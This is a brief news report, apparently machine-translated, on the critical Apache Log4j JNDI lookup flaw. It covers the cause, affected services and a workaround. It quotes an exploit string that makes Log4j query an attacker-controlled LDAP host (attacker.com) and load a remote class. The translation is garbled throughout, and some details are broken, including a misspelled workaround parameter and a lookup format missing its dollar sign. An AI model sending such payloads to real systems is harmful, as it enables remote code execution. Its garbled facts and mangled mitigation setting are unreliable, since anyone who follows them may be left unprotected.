in Apache log4j , popular framework for organizing logging in java applications, Critical vulnerability, allowing you to perform an arbitrary code when recording in the log of specially decorated Values in the format “{JNDI: URL}” . The attack can be carried out on Java applications that record the values obtained from external sources, for example, when displaying problem values in error messages. It is noted that the problem is subject to almost all projects using Apache Struts, including Steam, Apple ICloud and Minecraft. It is expected that emotivity can lead to a wave of mass attacks on corporate applications, repeating the history of critical vulnerabilities in Apache Struts.
The problem is aggravated by the fact that already is published the worker Explit , but fixes for stable branches at the moment not spromed . The CVE identifier has not yet been assigned. Correction included only in the test branch log4j-2.15.0-rc1 .
As a workaround of blocking vulnerabilities Recommended Set the parameter log4j2.formatmsgnologups to True.
The problem was caused by the fact that the log4j supports the processing of special masks “{}” in the lines displayed in the log, in which requests JNDI (Java Naming and Directory Interface). The attack comes down to the transfer of the string with the “$ {JNDI: LDAP: //attacker.com/a}”, when processing which the log4j will send an LDAP-user to the ATTACKER.com server to the Java class. Returned by the attacker server (for example, https://second-stage.attacker.com/exploit.class) will be loaded and executed in the context of the current process, which allows the attacker to achieve an arbitrary code in the system with the rights of the current application.